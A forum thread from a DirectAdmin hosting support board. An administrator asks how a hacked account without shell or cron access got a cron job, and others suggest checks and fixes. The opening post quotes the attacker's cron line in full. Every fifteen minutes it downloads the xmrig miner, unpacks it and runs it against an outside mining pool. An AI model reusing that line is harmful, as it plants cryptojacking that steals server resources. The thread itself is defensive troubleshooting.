User created cronjob without cronjob and shell access

E

ehsanch

Verified User
Joined
Jun 2, 2008
Messages
46
A user (with hacked website) created following cronjob:
Code: 
*/15 * * * * if ! pgrep -x 'xmrig'; then mkdir -p ~/.tmp && cd ~/.tmp && wget -q https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz && tar -xf xmrig-6.20.0-linux-static-x64.tar.gz && cd xmrig-6.20.0 && nohup ./xmrig -o drsql.ooguy.com:443 --user shell & f

This code apparently mines a cryptocurrency and occupies server resources.
The intended user does not have access to the cron job, and this cronjob was probably created without direct admin access.
user cgi-bin is disabled and php shell functions are disabled:
Shell Access (SSH) : Disabled
CGI-Bin : Disabled
Git : Disabled
Nginx Unit : Disabled
PHP : Enabled
Click to expand...

disable_functions = exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Click to expand...

Server : CentOS Linux release 7.9.2009 (Core)
Version 1.654
DA build for OS linux_amd64
Detected server OS rhel7_amd64
Click to expand...


How was it possible and how to prevent this type of attacks on directadmin server ?
 
Last edited:
You can try Process Tracking in CSF. Or you can suspend this account few times for few days so client will not spend money for hosting where he can't get it back with cryptomining
 
I want to know how user created cronjob!
In general, the fact that a user can create a cron job without having access to the cron job in DA, and that he can execute any system command in the cronjob is a big security risk that must be controlled.
So there is two concerns:
1- prevent user from add cronjob
2- limit commands that user can run in cronjob . (prevent running /bin/bash , /bin/sh , nohup and ... or just allow php !)
 
maybe user has SSH access and added cron via console? check logs.
 
User has not ssh access, but i found an entry in "last" command without ip:
Code: 
username pts/0                         Sat Oct 28 18:26 - 18:28  (00:02)
and in this time a cronjob created for this user (cron log):
Code: 
Oct 28 18:28:23 server23 crontab[14769]: (username) REPLACE (username)
 
so copy link to cronjob menu in account who has this ability, login to disabled account and try open cron menu through direct DA link. Maybe it just removes menu item but still allows set cron if you have link to it.
 
You must log in or register to reply here.
Back
Top